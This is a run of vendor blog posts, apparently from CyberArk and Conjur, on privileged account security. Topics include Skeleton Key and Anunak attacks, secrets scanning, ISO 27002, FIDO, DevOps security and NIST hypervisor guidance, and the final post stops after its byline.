Make it a game to start getting IT creds off disk, out of backups, and out of source control and config files.  Set up a bounty for your system admins to get these creds out of sight, anywhere and everywhere – it will cost less in time, money, and lost consumer faith in the end compared to credit card monitoring for thousands or millions of people!

Step 1: Get passwords off of wikis and out of shared repositories like source control

Step 2: Identify the high value master keys.  Control them and rotate them as frequently as you can- that means, don’t hardcode them into anywhere.

This is a solved problem, don’t let it sit on the IT to-do list for another year.  There are better practices and good tools that can be adopted that won’t hinder what you want your organization to be able to do from a functional perspective. These functional practices still get these credentials out of the hands of those who shouldn’t have them.  You don’t need to build something, you just need to deploy one of the many products that provide controlled access to secrets and system credentials and stop inventing your own.

Even if you don’t use Conjur to fix this problem, please fix it.  Take control of this issue before your company is the next lead article in The New York Times and The Wall Street Journal.   

 

 

]]>
“Skeleton Key” Malware: A Case for Protecting Privileged Accounts https://www.cyberark.com/blog/skeleton-key-malware-case-protecting-privileged-accounts/ Thu, 05 Feb 2015 13:40:51 +0000 https://www.cyberark.com/blog//

In early 2014, a global organization headquartered in London discovered a terrifying new piece of malware in its IT systems. Dubbed the “Skeleton Key” for its ability to “unlock” and provide privileged access to virtually every single employee account within an enterprise. The powerful malware strain allows cybercriminals to bypass Active Directory (AD) systems that only implement single factor authentication – or in other words, systems that rely on passwords alone for security.

A post-mortem of the first reported Skeleton Key cyber attack reveals the attackers resided in the network, without detection, for more than two years in an ongoing cyber espionage operation. Already on the company’s network via a remote access Trojan (RAT), the attackers stole legitimate credentials that gave them full, unfettered access. Then, by deploying the Skeleton Key malware, they were able to remotely carry out the rest of their attack.

The Skeleton Key purposely lacks persistence. The malware must be redeployed when a domain controller is rebooted. This intentional lack of persistence most likely indicates the stealthy nature of this particular operation. If it was made persistent over a reboot, the malware would leave behind a footprint, increasing the chance of detection. The hackers were clearly out for specific information and chose to maintain a low profile to evade discovery in order to obtain it.

Researchers believe the attackers have used Skeleton Key on other enterprises. One of the biggest indicators for this is the distinctive password structure used by the attackers when choosing logins for targeted systems. Passcodes would include the name of the organization’s Active Directory domain, followed by an “@” symbol and a code name for the company. This would not be necessary if only one single victim had been targeted.

The Skeleton Key has created waves in recent weeks since any organization using Active Directory could be a potential target. However, it’s important to remember that in order for attackers to utilize Skeleton Key and install malware on a domain controller, they first have to compromise the domain administrative credentials. If your organization has controls in place that isolate, monitor and control privileged account sessions, or utilize one-time passwords, attackers will not be able to take control of these admin credentials – which in turn prevents them from deploying Skeleton Key. Even if attackers are somehow able to circumvent all of those controls and utilize the malware, deployed behavioral analytics tools that detect anomalous user behavior will help to quickly identify and alert on a similar attack.

As frightening as the Skeleton Key may seem, we would argue that it once again comes down to protecting privileged credentials. If attackers are not able to exploit these credentials in the first place, they will be unsuccessful in deploying Skeleton Key malware in your network environment.

To learn more about how to get started on securing privileged accounts and credentials, check out the CyberArk Privileged Account Security Solution.

]]>
The Privilege Escalation Cycle and Its Role in Russia’s Anunak Cyber Attack https://www.cyberark.com/blog/privilege-escalation-cycle-role-russias-anunak-cyber-attack/ Tue, 03 Feb 2015 15:26:44 +0000 https://www.cyberark.com/blog//

Researchers from Russian cyber investigations firm Group-IB and Dutch security firm Fox-IT recently published a joint report detailing the activities of Anunak, the Russian hacker group who is said to have brought about the “armageddon” of the Russian banking industry. Named after the primary malware program in its arsenal, Anunak has been linked to numerous cyber attacks on U.S. and European retailers. While the group carried out attacks in multiple verticals, including media groups, government agencies and retail, its most lucrative operation has focused on Russia’s finance industry.

Unlike most attackers who target the customers of banks and financial institutions, Anunak targets the institutions themselves. Since 2013, Anunak has successfully infiltrated 50 Russian banks and five payment systems. After making their way inside these organizations, the hackers exploited privileged accounts in order to compromise internal networks, workstations and servers. This access allowed them to transfer funds to accounts under their control and even infiltrate 52 separate ATM systems and make off with the cash. In some cases, the damage has been so severe that financial institutions have lost their banking licenses altogether. The report estimates Anunak has stolen as much as $18 million (or 1 billion rubles) – making off with roughly $2 million per breach. The group has also ventured beyond financially motivated attacks, compromising media groups and other organizations in search of intellectual property (and likely a trading advantage in the stock market). In cases where the group gained access to government agency networks, their aim was espionage.

This criminal enterprise is still very much alive, posing a threat to enterprises worldwide. So how can you protect your organization against such cyber threats when so many others before you have failed and suffered catastrophic damage as a result?

The first step requires a mindset shift. No matter what, motivated attackers will find a way to get in. And as phishing methods (such as those employed by Anunak) become increasingly sophisticated, employees increasingly become a highly likely point of infiltration. Once inside, attackers focus on hijacking and exploiting unprotected privileged accounts and credentials (such as a systems administrator’s credentials, for example), enabling them to move laterally across the network, gain access to critical systems and exfiltrate stolen data. According to CyberArk’s recently published Cyber Threat Report, over 80 percent of all serious security incidents included a compromise and misuse of privileged accounts at some point in the attack process.

If the Anunak attacks teach us anything, it’s that while cyber attackers may have different motives or end goals, their pathways are usually the same: commandeer privileged accounts, escalate access to move across the network and steal critical data and assets without detection. This privileged escalation cycle is something we see time and time again, and organizations need to be prepared to protect against it. By implementing the necessary tools and infrastructure to manage, continuously monitor and track privileged account activity, along with the analytics and intelligence to identify anomalous activity, organizations can protect themselves and enable a quick response, making it possible to mitigate potential damage early in the attack cycle.

Learn more about privileged account exploits and read first-hand accounts from some of the world’s top cyber forensics and incident response professionals in our Cyber Threat Report.

]]>
U.S. Military Twitter Account Hacked by Islamic State Sympathizers https://www.cyberark.com/blog/u-s-military-twitter-account-hacked-islamic-state-sympathizers/ Thu, 29 Jan 2015 16:49:02 +0000 https://www.cyberark.com/blog//

Hackers claiming allegiance to the Islamic State hijacked the Twitter and YouTube accounts of the U.S. military’s Central Command, reported The Washington Post. These account takeovers – which included the publication of a series of posts containing threatening messages, propaganda videos and military documents – are reminiscent of other social media attacks, such as those performed by the Syrian Electronic Army against the Associated Press and FIFA World Cup’s Twitter accounts.

The proliferation of social media channels and associated accounts presents a serious security threat to government and enterprise organizations alike. A recent industry study of Fortune 100 firms reveals three major issues related to social media plaguing large organizations today: unauthorized accounts, content threats and account attacks.

Most companies maintain numerous social media accounts on Twitter, Facebook, YouTube and LinkedIn, often with unique accounts for different product lines, languages, countries and stakeholders. Passwords for these accounts are often shared amongst teams. In some cases, they’re even managed by third parties. Making matters worse, the same password is frequently used across multiple accounts, and passwords are rarely changed. As a result, social media accounts are becoming easy targets for increasingly sophisticated cyber attackers due to the lack of tracking, record-keeping or accountability for each individual post.

We’ve seen just how quickly social media can tear down a brand or organization at the hands of hackers or malicious insiders. Account takeovers, such as the one reported this week, can lead to the unauthorized publishing of confidential information, such as intellectual property, legal, regulatory, and compliance violations, disclosure of personal data and identity theft. The result can be severely compromised brand reputations and significant financial loss. With more frequent attacks of this nature, it’s time for organizations to take a closer look at how they manage their social media accounts – and start treating them like the privileged accounts they truly are. The following best practices for privileged account security should be employed to mitigate social media security risks:

  • Enable transparent access.
  • Eliminate shared credentials.
  • Automate and enforce password changes.
  • Trace account activity.
  • Record social media administrator sessions.

As evidenced this week, the threat is real. Now is the time to ensure your social media accounts are not an easy target. To learn more about social media and the shared privileged account, download this free whitepaper.

 

]]>
4 Lessons I Learned Trying to Build a Secrets Scanner https://www.cyberark.com/blog/4-lessons-i-learned-trying-to-build-a-secrets-scanner/ Thu, 29 Jan 2015 20:20:00 +0000 https://cyberarkvx2.wpengine.com/blog/4-lessons-i-learned-trying-to-build-a-secrets-scanner/ Do you know where all the secrets are on all the systems and code you administer? Are all of your private encryption keys, API keys, and passwords secure, or have some of them slipped into public repos, or globally readable directories? Are you sure?

I worked on trying to build a secrets scanner: software to find private keys, API keys, or passwords.  How?  Keys we can often be identified by extension or the head of the file. For the other secrets, most of the time these are automatically generated and look like ‘random’ values. So if we eliminate anything with a pattern, what is left are the secrets. Sounds simple, right?

I created a multiple-pass system. There is a special-purpose initial pass which looks for files like “NAME.pub” so that it can flag “NAME” as a possible private key file in its second pass. After that it looks for files of interest (key files, configuration files, or code files) by extension; it then examines the identified files in greater detail according to their type.

secrets-scanner
The current code is still very preliminary, and results vary greatly, but as an example on my personal machine with about 45GB mounted in almost 400,000 files on an HDD, the whole system scan took about 22 minutes and ultimately flagged 1,171 files, after examining 28,434 files based on extension. Currently, most of what it flags are actually false positives, in part because although the false positive rate is low, there are very few files with secrets on my machine. Additionally, the source code other than Ruby is not being truly parsed, so there are cases where it misses a true result or incorrectly flags some benign results which it could correctly judge with proper parsing.

Lesson #1

There are a lot of keys and source code files on a machine. I was surprised at just how many keys there were. LibreOffice alone had more than 30 keys. Now, these could be excluded very simply by checking for public keys versus private keys, which is not yet done, but it illustrates some of the volume I found. Similarly, I was not expecting the thousands of source files from all sorts of applications, although it is logical in hindsight given the interpreted languages they are using.

 

There are a few obvious ways to reduce the problem. We can search only in a targeted location, do a base scan, and subsequently only consider modified files, or even better, work intelligently with diffs. Thus whatever false positives may remain need not be reviewed more than once.

Lesson #2

Use a language parsing library to extract strings from source code. It seems like a simple problem to figure out, what is a string and what isn’t, but it’s actually non-trivial.  If one starts to try to solve it by regexes, it will be found that eventually a parser will be needed anyhow. In my code, only a Ruby parser has been added so far, but the other languages will need to be parsed as well to achieve accurate results.

Lesson #3

The most intractable problem for the software is separating the hard false positives. For instance, cryptographic values, like a hash, will also appear random. When these values are embedded in a source file, they trigger my detector. In general, cryptographic values and machine generated secrets are hard to distinguish by software because they can come from the same sample space.

Lesson #4

Ultimately, we must call in a human. But even if many of the strings or files identified are false positives, the area which needs human review is greatly reduced.  Not only that but the false positives, which are difficult for the software to recognize, are often very obvious to the human reviewer. If this is combined with an efficient UI for review, the software and human reviewer team can be far more effective than either one on it’s own.

 

]]>
ISO 27002 and Safeguarding Privileged Access https://www.cyberark.com/blog/iso-27002-safeguarding-privileged-access/ Wed, 28 Jan 2015 15:12:30 +0000 https://www.cyberark.com/blog//

The International Organization for Standardization (ISO) has published an updated International Electrotechnical Commission (IEC) 27002 standard that organizations the world over should follow as a basic, best practice for security. ISO/IEC 27002 is important because it provides an international framework that auditors rely on for verification of compliance with security mandates, and if the recent string of high-profile breaches in the past 12 months has taught us one thing it’s that best practices are still not being followed when it comes to general security considerations.

There’s a lot of good information in the updated standard and one key addition centers on privileged account management. The paper is dense with content – your typical standards framework – so we wrote a new white paper, “Safeguarding Privileged Access: Implementing ISO/IEC 27002 Security Controls with the CyberArk Solution,” that lays out a blueprint for implementing the CyberArk Privileged Account Security Solution to enforce controls pertaining to privileged access within the standard.

We all know that true security goes well beyond compliance, however, many organizations use the ISO/IEC standard as a starting point for their information security program. For large global enterprises that operate in multiple countries, it can be useful as a general controls framework to help achieve compliance with many country-specific regulations. For small-to-medium sized companies, it can be an effective tool in establishing more mature information security controls.

The recommendations stress the importance of managing privileged access rights in order to protect information. As our recent threat report showed, this is critical to thwarting advanced attacks. For example, in cases of termination or resignation, disgruntled employees or contractors can use their privileged access rights to deliberately corrupt or sabotage information, and/or be tempted to collect information for future use.

There are controls related to securing privileged accounts throughout the ISO/IEC 27002:2013 standard, including requirements for:

  • Establishing and implementing privileged access policy
  • Identifying the privileged access rights associated with each system or process
  • Restricting the use of privileged access to authorized users based on functional roles
  • Authenticating privileged users, ensuring individual accountability for privileged actions
  • Changing default vendor passwords
  • Restricting access to privileged utility programs
  • Controlling privileged access by suppliers
  • Logging and monitoring privileged access

If you’d like to learn more about the new standard, have a read through our paper, or listen to a recent webinar, outlining how to best protect privileged accounts to address the new controls.

]]>
FIDO Alliance Specifications Miss the ‘Keys to the IT Kingdom’: Privileged Accounts https://www.cyberark.com/blog/fido-alliance-specifications-miss-keys-kingdom-privileged-accounts/ Thu, 22 Jan 2015 14:34:07 +0000 https://www.cyberark.com/blog//

There’s been a lot of news about the recent FIDO (Fast Identity Online) Alliance announcement signaling the death of passwords and a boon for stemming the rash of massive data breaches. Will it really? While a great step forward, it completely misses that there’s a massive difference between consumer passwords and privileged account passwords or credentials, and how to weigh the value of protecting each.

The simple fact is that attackers covet privileged access (you can read a quick post on why here). Privileged accounts are exploited in almost every targeted cyber attack. Threat investigators say that between 80-100 percent of all serious security incidents they’ve investigated featured the “signature” of compromised and exploited privileged accounts in the attack process. For some reason, FIDO completely omits this in their work …

So what is FIDO doing? Backed by industry heavyweights including Microsoft, Google, PayPal, Bank of America and MasterCard, FIDO issued the first fully completed drafts of two specifications – the Universal Authentication Framework (UAF) and Universal 2nd Factor (U2F) – aimed at building a foundation for secure online communications without using passwords. In the world of safe online consumer passwords, these specifications are a great step forward.

However, as an industry we need a clear delineation between personal passwords and those tied to organizational assets. While it is reasonable to allow users to manage their own personal credentials, no employee or contractor should ever be put into the position to create, manage or change passwords for privileged accounts. Password reuse, template-based brute force susceptible passwords, and many other vulnerabilities, all arise from policies that allow employees to manage these critical asset passwords. These need to be managed by the organization and handled in a completely different manner than personal passwords.

Will FIDO be a boon for stemming the rash of massive data breaches? No. Until the ‘privileged account problem’ is solved, breaches will continue.

Organizations need a better solution to protect key passwords – such as those for privileged accounts that control access to their most sensitive assets. An automated password management tool is essential for making privileged account credentials as secure as possible. Once deployed, the level of complexity and randomness of managed passwords becomes much higher than if left to individual choice, while eliminating the memory problem. This also makes it possible to protect the passwords from malware that collects passwords through key logging, screen-capture and other means of intercepting passwords.

For a much more in-depth view of what it takes to solve the privileged account problem, check out our solution.

]]>
Attack Origin: Does it Even Matter https://www.cyberark.com/blog/attack-origin-even-matter/ Tue, 20 Jan 2015 15:42:56 +0000 https://www.cyberark.com/blog//

It’s been an exciting month keeping up with the latest cyber security breach! If you aren’t caught up, listen to this great recap by NPR. And CyberArk founder and CEO, Udi Mokady, joined the CNBC’s Squawk Box to point out that that the most important lesson from the Sony breach is that protecting the inside is what really matters. The news cycle is focused on who perpetrated the attack and what the US government might do in reaction, however, this doesn’t help companies become more secure.

As we learn from this and other recent attacks (on entertainment, financial, retail and other industries) it has become next to impossible for an organization to know why and by whom it may be attacked. Is it a criminal gang looking for financial gains or a nation state looking for a political gain?  Or is it an adversary looking to use the organization as a stepping stone for an attack on a partner or another connected organization? An activist looking to discredit an organization?

Who’s responsible for an attack has become more difficult to pinpoint as tools and techniques are widely distributed, shared, studied, used and reused. Organizations no longer know who the attackers are or why they are attacked. Will it be the content of a movie or a comment from an executive that sets off a nightmare situation for a company?

Thus, the security of the organization must focus on the inside. All targeted attacks make use of the same techniques to operate inside the network. Hijack credentials, gain control of privileged accounts and use them to move around, undetected, throughout the organization – this is at the heart of every attack. If you don’t secure your privileged accounts, you become a sitting duck just waiting for the next adversary who decides to make an example of you…

Companies must take recent lessons to heart or face the consequences.

Not Who….How:  From a security perspective, the Sony attack is a clear demonstration that it no longer matters WHO is attacking an organization, but HOW they did it.  The lesson from this breach is more about the low-level security practices employed by companies and how this has created a frightening new reality in which attackers are able to commandeer and control a company’s infrastructure – no matter where the attack originates.

Sony is Snowden…Snowden is Sony:  At its core, the Sony breach is very similar to other massive attacks/breaches – including the retail breaches that dominated headlines in 2014 and even Edward Snowden and the NSA.  While the outcomes were different, each of these attacks required the theft and exploitation of administrative and privileged credentials, giving the attackers full control of the targeted company’s infrastructure.

Motivations are Meaningless: The line between nation-state and criminal gangs are increasingly blurred.  The attacks once limited to nation-funded groups are now widely re-used. FinFisher, Gamma, and Hacking Team are examples of commercial, “for sale” targeted attack capabilities used by nation states. But ultimately, the motivation is meaningless. Today, it was a movie that was the reason. (Or was it?) Is tomorrow’s attack because of a newspaper article? It doesn’t matter. What matters is how the attacks are carried out.  This is the key to stopping them.

Why Every Organization is Vulnerable:  We conducted an analysis of recent major attacks with forensics experts from companies including Mandiant, Deloitte, Verizon and others that showed cyber-attackers have broadened their targets, pursuing companies of all sizes, in all industries.  Why? Every company is connected to other companies by both general business and even IT systems themselves (think of the supply chain in any industry). One company might simply be a doorway into another. . As more businesses fall victim to devastating attacks, the more they need security that focuses on the securing the inside of the network.  It’s time to focus on what can have a positive impact on security and spend less energy trying to uncover where the attack may have originated.

]]>
3 Ways to Integrate Security and DevOps: SecDevOps https://www.cyberark.com/blog/3-ways-to-integrate-security-and-devops-secdevops/ Tue, 20 Jan 2015 15:33:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-ways-to-integrate-security-and-devops-secdevops/  

In our last blog post we examined the overall state of DevOps. In today’s post we are going to focus more narrowly on how you can include Security in your already well-firing DevOps process.

With DevOps firmly entrenched in most SaaS and non-SaaS software development organizations these days one might be asking themselves what’s next? As some smart people have already eluded to, with increased internal and external threats to your infrastructure, the next step in the evolution of DevOps is the addition of Security to the process.

Up until this point Security has been outsider in the sometimes blissful relationship between Development and Operations. When things are going well you might ask yourself if you should add security on top of each deployment or if you should have security rules and regulations in place before any development begins? Remember, the whole point of DevOps is to speed up our ability to ship products and gather feedback. Because of this the security element can sometimes be viewed as a bottleneck to the process.

So how does one go about integrating Security with their already established DevOps process, or create a brand new process altogether? Here are 3 places to start that will increase your chances of succeeding in not only speeding up your development, but doing it in a way that protects your organization from internal and external threats:

1) Hiring the right team members

Who owns your DevOps process? Hopefully all Developers and Operation folks share in the responsibility but do you now want to train them on Security? I am sure the answer is no so ideally you are able hire Security experts who also have some DevOps chops. Namely they would be able to identify and submit bug reports with the potential of fixing them as well. With these added skills the hope is that the DevOps process does not slow down, instead it remains efficient but has an added layer of security that wasn’t in place before.

If you Security team simply doesn’t have the dev chops to positively contribute to the process than you need to hire and position these Security team members as Experts and Advisors for the rest of the team. This means that they should be involved in each stage of the development process, but instead of writing the code they can benefit from the open and agile communication that will lead them to advise DevOps team members if they are squared away from a security perspective prior to them deploying any code.

01_20_15

2) Company Culture

With DevOps it is easy to get lost in Automation and forget that this process needs to be driven by the right people. As we looked at in the first part hiring the right team members is crucial. The reality is that hiring alone isn’t going to solve for SecDevOps. Most likely your DevOps process is structured around your organization’s overall business goals and collaboration. We would argue that one of subsets of those business goals should include your organization’s overall culture. Culture is always difficult to define, it becomes a bit easier with DevOps in place, but how does Security fit into the mix? Do you already practice Scrum, SAFe, or DAD? If so these bedrock principles of DevOps can lend themselves nicely to integrating an element of Security into the mix. Again, we don’t want to reinvent the wheel or disrupt an already well performing process, instead we want an element of inclusion with security that will enable products to be shipped even quicker with a hat tip towards security along the way.

With the very basis of DevOps aligning with collaboration it is important to take a step back and assess what type of information is actually being shared. Without SecDevOps in place most likely not a lot of security checks/best practices/information is being exchanged during the feedback loop. The absence of this input naturally opens up your organization to internal and external threats. By including Security as an integral part of your Corporate Culture you will find the information shared internally will naturally factor in Security as a crucial component of building products and gathering customer feedback.

3) Daily Augmentation

So far we have covered how your Hiring Process and Corporate Culture will factor into aligning Security and DevOps. The final factor to take into consideration is Augmentation. Fundamentally a pillar of the DevOps cultural movement, augmentation is the ability to increase the impact that DevOps has on your organization as a whole with each iteration. Your ability as a Technical Manager or Technical Practitioner to make a positive contribution to your organization’s overall success as it relates to Security is to make sure that a Security Expert is involved in every stage of your DevOps process.

Whether it be in Planning, Testing, Deployment, Monitoring or Feedback your job is the make sure an element of security weighs in at each stage. It isn’t enough to have a ‘Security Review’ at the end of each sprint, instead Security considerations need to augment, or improve the already existing agile environment that is enabling your business to reach its goals.

Obviously there are numerous other variables at play in this SecDevOps equation but we hope these points will act as building blocks for you to leverage when installing a similar process at your organization. As with any good DevOps initiative, the goal isn’t to get it 100% right the first time, but instead learn from each iteration and gradually improve how your teams collaborate, make decisions, and solve for the business.

]]>
2015 View of DevOps and Cloud https://www.cyberark.com/blog/2015-view-of-devops-and-cloud/ Mon, 12 Jan 2015 18:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/2015-view-of-devops-and-cloud/  

2015 is unfurling with the same sound and fury that we saw in 2014: cloud adoption continuing to grow, significant initiatives around innovation and speed to deploy are underway across the technology industry, and the DevOps community is still the rock around which the tempest of security and innovation combine.

Over the course of the next three blog posts, we’re going to take a look at the state of DevOps and cloud, focusing in on some of the areas of interest that we hear and see with increasing frequency. We’ll consider where things stand, where they’re headed, and what it means — and what you can do to make this the year that your DevOps projects and programs stay on track.

The State of DevOps

First and foremost, the tools and technologies that describe the typical DevOps team have grown significantly over the last 12 months. In looking across the entire Conjur customer base, and from the people we speak to regularly the community, we are seeing the emergence of a reference architecture for DevOps that is markedly different from what we saw a year ago. Specifically:

  • (Almost) everyone is running a hybrid platform;
  • Automation (and tools to enforce it) are a given;
  • Security is increasingly a DevOps function, in part or whole.

1_12_15

Access Management for Any Cloud

While there was never truly a heyday for single-cloud deployments, the last year has proven that hybrid cloud architecture is here to stay. As far back as April, hybrid cloud was being declared “king” by RightScale, who noted that 98% of respondents are using cloud now, and 58% of those people are doing so with hybrid cloud as the cornerstone of their strategy.

For DevOps teams, this creates a unique challenge: how to authenticate and authorize users, machines, and code across multiple different platforms, rather than relying on a single vendor/platform solution (such as AWS IAM).

Automate, Automate, Automate

The tools used to deploy machines and infrastructure across this new kind of infrastructure are more clearly delineated than they once were. From a treetop perspective, the list breaks into three parts: (1) configuration management, such as Chef, SaltStack, and Puppet, used to create machines and software-defined architecture quickly and consistently, (2) continuous integration technology, such as Hudson, Jenkins, and CruiseControl, and (3) platform abstraction technologies such as Docker, Rocket, and VMWare, often used together to create clean, consistent, and easily deployed dev, test, and production environments.

Of course, this also creates a new threat surface for DevOps – something we will look at in more detail in the coming blogs in this series. Building in security, especially around access and authorization, has been hindered by a lack of innovation in the legacy point solutions that managed this kind of concern in the on-premise world. The tools that worked inside the server closet simply haven’t remained relevant when forced to map to this new, highly-automated, and cloud-native environment.

Nobody Puts Compliance in the Corner

Audit, compliance, and security all need to be rebuilt: get this wrong, and you have a complete fail (see Code Spaces); get it right, and you avoid the kinds of outages that take major companies offline and block cloud initiatives.

From HIPAA to SOX, DevOps architecture, tools, and practices are in scope for audit teams, and ensuring that there is a complete and immutable record of all privilege-related activities is essential. Practices that are easy — putting secrets in source control systems, for example — are not necessarily wise, and one of the functions of a good audit is to ensure that shortcuts don’t put the business or the data it manages at risk.

The good news is that there are easy ways to think through the implications for DevOps. In the second part of this series, we’ll take a deeper look at the cloud landscape, and explore how and why cloud native tools have become the foundation for any DevOps-aligned security and compliance program, and cover the three problems that any team must consider when building for cloud native architecture.

 

]]>
Machine Intelligence – The New “Big Data” https://www.cyberark.com/blog/machine-intelligence-the-new-big-data/ Tue, 30 Dec 2014 12:58:00 +0000 https://cyberarkvx2.wpengine.com/blog/machine-intelligence-the-new-big-data/  

Big data has been an incredibly hot topic over the past few years, with a rise in both the number and types of environments in which analytics run. With that trend has come an increasing shift of computational resource and data custody to the cloud; from genomic analysis (as Conjur customer GNS Healthcare does in the cloud) to machine learning (as Tamr provides), the adoption of big data analytics in the cloud brings with it a number of new considerations, including privileged identity and access management and security.

Shivon Zilis thinks the next one will be “machine intelligence”. Zilis is an investor at Bloomberg Beta, and some of her work on the the Machine Intelligence Landscape was recently published in Forbes.

12_30_14

Conjur is excited to be featured on this list, and are even more excited that our space, of security / authentication (and we’d like to add authorization) is marked as one of the transformative areas for this emerging space. Forbes contributor Anthony Wing Kosner picked up Zilis’s article, connecting it with the automation landscape of current offerings and their use in production environments.

The evolution of cloud and the intersections between its usage and data analysis, identity, and security is an incredible place to be. Over the course of 2015, we will see both tremendous innovation and significant new challenges; we believe strongly that the ways in which both will be addressed will require new solutions that are themselves cloud native and platform agnostic.

Conjur is changing the privileged identity management (PIM) and cloud workload security markets, and doing so in a way that’s fundamentally aligned with both security and DevOps teams and their cultures. If you’re on board, we would love to tell you how and why we’re different.

Reach out and get started today.

 

]]>
3 Lessons on CLI UX Design https://www.cyberark.com/blog/3-lessons-on-cli-ux-design/ Mon, 22 Dec 2014 11:21:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-lessons-on-cli-ux-design/  

Last week’s DevOps Weekly included a link to an interesting article on the metrics and merits of good user experience (UX) design for CLI applications. Primarily based on an interview with Randall Hansen, who formerly led the UX design team at (Conjur customer) Puppet Labs, the article raised a couple of particularly important points that we hold as truths when designing Conjur, as well:

CLI UX Design Lessons

  • CLI design should be elegant
  • Speed trumps splash
  • Good documentation is foundational

CLI design should be elegant.

One of the main points in the Medium article is that the CLI is used by what they call sysadmins, although we would argue that the target user could equally be a DevOps user. If one agrees that the goal of a user experience and interface should be to delight the user, then there is a distinction between those things which a typical end-user will be delighted by, and those which lead to a feeling of delight in an administrative user.

In an apocryphal case study, Hansen relates how a stock exchange application malfunctioned, causing tens of millions of dollars of loss for every second that it continued running. With a quick set of keystrokes, the admin using a CLI was able to quick identify and kill the process. If elegance is defined as “simple and powerful“, then this is a fantastic example of how to ensure that it’s in place for a command line application.

It’s also one of the primary ideals we hold when designing Conjur’s CLI. From tab-completion on Conjur’s commands to context-appropriate help, simplicity and appropriate context are woven into every command and interaction that our command-line users will experience.

12_22_14

Speed trumps splash.

A second point from Hansen is also explained by example: “When Gmail goes down for ten minutes, the entire internet freaks out; the difference between those ten minutes of inconvenience and some potentially catastrophic downtime might hinge on the user experience that a sysadmin encounters when solving the problem.”

Conjur, thankfully, doesn’t take down systems — even if an entire Conjur master server were to be hit with an rm -rf, our high-availability architecture will ensure that requests for authz events, secrets, and permissions will continue to function. However, being able to quickly and gracefully interact with sysadmins to prevent inadvertent mistakes is a core design intent; while we do see value in building a rich user experience for visualizing authz events and data, we have made an explicit decision to do so not at the expense of the CLI, but in conjunction with it.

Good documentation is foundational.

Finally, we agree wholeheartedly with Hansen on the point that good documentation is critical for a CLI user. More than simply a set of API references — although those are necessary, too — documentation for a command line experience needs to provide specific use cases and explain both what and why they matter.

For Conjur, that means having a great set of tutorials that walk users through the basic flows that they will encounter when using the system. From “Conjurizing” users to migrating secrets to the system to integrating with LDAP systems, we believe that time and effort spent on tutorials will translate directly to an improved (and hopefully even delightful) Conjur experience.

All of our tutorials are available on our Developer site.

And while we’re proud of what we have built, we’re just getting started. We want to hear from you, especially if you’re in the trenches of the DevOps movement, dealing with myriad CLI tools every day. What makes your life easier? What’s missing?

Of course, if you’re not yet using Conjur, we’d love to have you on board with us. We’re changing the future of authorization-as-a-service, and we’d be happy to get a copy of Conjur into your hands today. Just click the big blue “Get Started” button below, and we’ll set you up — and let us know what your user experience is like, and where it can be better!

 

]]>
Who Cares? Access Management for Any Cloud! https://www.cyberark.com/blog/who-cares-access-management-for-any-cloud/ Wed, 17 Dec 2014 14:09:00 +0000 https://cyberarkvx2.wpengine.com/blog/who-cares-access-management-for-any-cloud/  

Last week, Bloomberg ran a story about a major software development shop that has a truly hybrid cloud environment: a mix of Azure and AWS. The article is great (and worth a read), but it can be summarized simply: nobody picks just one provider any more.

Quoting from the piece, the client of the two cloud providers notes that he chose to hybridize across both platforms in response to last month’s Azure outage. His decision — a defensive play that makes it comparatively easy to switch back to AWS if Azure fails — “underscores the challenges Microsoft faces as it tries to wrest market share from industry leader and crosstown competitor Amazon.”

12_17_14

From the perspective of a neutral platform provider that works with both providers — as well as to Rackspace, VMWare, and a wide variety of bare metal providers — what the Bloomberg article describes is a case for abstracting access management away from the underlying platform. Imagine the effort involved in switching from one provider to another; as part of the process, how will you handle access management? User permissions? Service-to-service auth, so that your Jenkins server can still operate without having to rewrite your entire IAM stack?

One of the major benefits of the Conjur approach is that it decouples identity and access management from any particular cloud vendor. In doing so, our customers can get to a comfortably neutral place: who cares who wins the cloud platform argument? Access management will work regardless — users and services will be able to make Conjur calls no matter what the architecture is that underpins their actual work. Audit and compliance can see events and logs without interruption, even as the hardware and software environments shift.

It’s a classic write-once, use-anywhere scenario: Conjur is access management for any cloud, bringing elasticity to IAM and backing it up with strong zero-trust networking principles and a DevOps-friendly toolchain. And once it’s in place, who cares who your cloud provider is?

 

]]>
NIST Recommendations for Securing Virtual Environments: Don’t Forget about Privileged Accounts https://www.cyberark.com/blog/nist-recommendations-securing-virtual-environments-dont-forget-privileged-accounts/ Thu, 11 Dec 2014 18:07:39 +0000 https://www.cyberark.com/blog//

By John Worrall

Business-critical data increasingly is being moved to the cloud, which is why the new NIST recommendations for how enterprises and IT departments can better secure their virtual environments and hypervisor software are incredibly important.

The guidelines highlight two different approaches to securing hypervisors – the first is based on architectural options and the second is based on configuration choices that form the core administrative functions.

NIST recommends accounting for five primary hypervisor functions: 1) execution isolation for virtual machines, 2) device emulation and access control, 3) execution of privileged operations for guest virtual machines (VMs) by the hypervisor, 4) management of VMs, and 5) administration of hypervisor host and hypervisor software.

The report goes on to make 22 security recommendations in correlation to each primary hypervisor function. One of these recommendations addresses direct access, saying “the number of user accounts (including privileged accounts) requiring direct access to hypervisor host should be limited to bare minimum (i.e., two or three).”

Moreover, the report goes on to recommend that user accounts should be managed through a directory infrastructure which enables organizations to monitor account changes in a central location (i.e. delete an account if an employee is no longer with the organization) and set password policies (i.e. complexity and expiration rules) that can be centrally defined and enforced.

While hypervisor security is important regardless of which approach your organization chooses to adopt, here at CyberArk we are firm believers that privileged account security should be at the core of every comprehensive security strategy. According to our recent threat report, privileged accounts are exploited in 80-100% of all advanced attacks. This means that organizations should be most concerned about protecting against the exploitation of privileged accounts that allow perpetrators to move across their entire virtualized environment.

As the first step for any organization that has implemented virtual environments and hypervisor software, there should be a full sweep and inventory of existing privileged accounts to determine how many exist, how many are being used and where flaws in the system might exist. Free tools such as our Discovery & Audit utility can help with this. Next, organizations must continue to diligently control and monitor privileged account activity in order to properly secure the network.

The sooner organizations realize that privileged accounts are at the core of all successful targeted attacks and data breaches – regardless of whether employees work in local or virtualized environments – the sooner they can close the door on would-be attackers, and take control of their network and data. Our white paper is a good resource to find out how CyberArk can help organizations to effectively and efficiently meet the full range of requirements regarding privileged accounts related to NIST.

]]>
Citadel Malware Targets Password Management Applications https://www.cyberark.com/blog/citadel-malware-targets-password-management-applications/ Tue, 09 Dec 2014 22:14:20 +0000 https://www.cyberark.com/blog//

By Lavi Lazarovitz

